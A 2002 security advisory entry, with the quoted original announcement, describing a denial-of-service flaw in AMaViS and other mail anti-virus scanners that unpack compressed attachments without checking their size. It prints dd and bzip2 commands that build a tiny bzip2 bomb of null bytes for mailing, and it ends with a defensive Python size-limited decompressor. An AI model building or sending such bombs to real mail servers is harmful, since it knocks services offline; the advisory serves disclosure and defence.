AMaViS SMTP Anti-Virus Scanner Can Be Crashed By Remote Users Sending Compressed Files With Large Numbers of Null Characters
|
Date: Feb 26 2002
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Description: iNetd Security Research reported a vulnerability in the AMaViS e-mail anti-virus scanner. A remote user can cause the scanner to consume all available memory. Anti-virus products from other vendors are also affected.
It is reported that the scanner does not check the file size inside a compressed file before opening the file for scanning. As a result, a remote user can send a compressed file that contains a large number of numerical zero characters through the mail gateway to cause the anti-virus scanner to consume all available memory and potentially crash.
The following demonstration exploit steps are provided:
root@maciel:/tmp# dd if=/dev/zero of=/tmp/file count=200000
root@maciel:/tmp# ls -l /tmp/file
-rw-r--r-- 1 root root 102400000 Feb 24 22:13 file
root@maciel:/tmp# bzip2 -z file
root@maciel:/tmp# ls -l /tmp/file.bz2
rw-r--r-- 1 root root 113 Feb 24 22:14 file
In the above example, a small compressed file is created that contains a very large amount of null characters. When the server attempts to uncompress this file, a denial of service condition is created.
This vulnerability reportedly also affects other e-mail anti-virus scanner products.
|
Impact: A remote user can cause the e-mail anti-virus scanner to consume available memory and potentially crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.amavis.org/
|
Cause: Resource error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: "Eduardo R. Maciel" <maciel@inetd.com.br>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 25 Feb 2002 16:29:02 -0300
From: "Eduardo R. Maciel" <maciel@inetd.com.br>
Subject: Anti Virus Mailscanners DOS
|
-----------------------------------
-----[ SECURITY ANNOUNCEMENT ]-----
-----------------------------------
iNetd Security Research Announcement
Name: Anti Virus Mailscanners DOS
Systems Affected: System independent
Date: 25/02/2002
Subject: Potential DOS.
Severity: HIGH
Author: Eduardo R. Maciel (maciel@inetd.com.br)
Description
===========
An antivirus mailscanner should check the filesizes inside a compressed file like .tar.gz, .zip, .bz2, etc., BEFORE opening the file for scanning.
All the products that don't do that checking are vulnerable to a Denial Of Service attack.
Pay attention to the procedure below:
root@maciel:/tmp# dd if=/dev/zero of=/tmp/file count=200000
root@maciel:/tmp# ls -l /tmp/file
-rw-r--r-- 1 root root 102400000 Feb 24 22:13 file
root@maciel:/tmp# bzip2 -z file
root@maciel:/tmp# ls -l /tmp/file.bz2
rw-r--r-- 1 root root 113 Feb 24 22:14 file
Since the file has only null (numerical zeros, not the ASCII kind) characters, the size of the compressed file was reduced to an almost insignificant value.
Sending several mails with these compressed files may leave a machine out of memory or disk space.
Solution
========
The mailscanner should check the filesizes inside a compressed file.
Credits:
Eduardo R. Maciel
maciel@inetd.com.br
|
|
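One way to apply the recommended size check, as an added example that is not code from the advisory, its author, or AMaViS: a bzip2 stream does not record its uncompressed size, so the limit is enforced while decompressing in bounded chunks. The names bounded_bunzip2, triage, MAX_OUTPUT and CHUNK and the 8 MiB limit are assumptions.

```python
import bz2

MAX_OUTPUT = 8 * 1024 * 1024  # assumed per-attachment policy limit
CHUNK = 64 * 1024             # most output produced per decompress call


class ExpansionLimitExceeded(Exception):
    """The attachment expands past the configured limit."""


def bounded_bunzip2(data, max_output=MAX_OUTPUT):
    """Yield decompressed chunks, aborting before max_output is exceeded."""
    dec = bz2.BZ2Decompressor()
    total, feed = 0, data
    while not dec.eof:
        piece = dec.decompress(feed, max_length=CHUNK)
        feed = b""  # unread input stays buffered inside the decompressor
        if not piece and not dec.eof:
            raise ValueError("truncated bzip2 stream")
        total += len(piece)
        if total > max_output:
            raise ExpansionLimitExceeded(
                f"over {max_output} bytes from {len(data)} bytes of input")
        yield piece


def triage(data, max_output=MAX_OUTPUT):
    """Return ('scan', size) if the payload fits, else ('reject', reason)."""
    size = 0
    try:
        for piece in bounded_bunzip2(data, max_output):
            size += len(piece)  # a scanner would inspect `piece` here
    except ExpansionLimitExceeded as exc:
        return ("reject", str(exc))
    except (OSError, ValueError) as exc:  # OSError: invalid bzip2 data
        return ("reject", f"malformed: {exc}")
    return ("scan", size)


# Constructed samples: 32 MiB of zero bytes (same idea as the dd/bzip2 steps,
# smaller) and a short benign text attachment.
ZEROS = bz2.compress(bytes(32 * 1024 * 1024))
BENIGN = bz2.compress(b"Subject: quarterly report\n" * 200)

if __name__ == "__main__":
    print(len(ZEROS), triage(ZEROS))
    print(len(BENIGN), triage(BENIGN))
```

Memory use stays near CHUNK regardless of how far the input would expand, because chunks are handed on rather than accumulated.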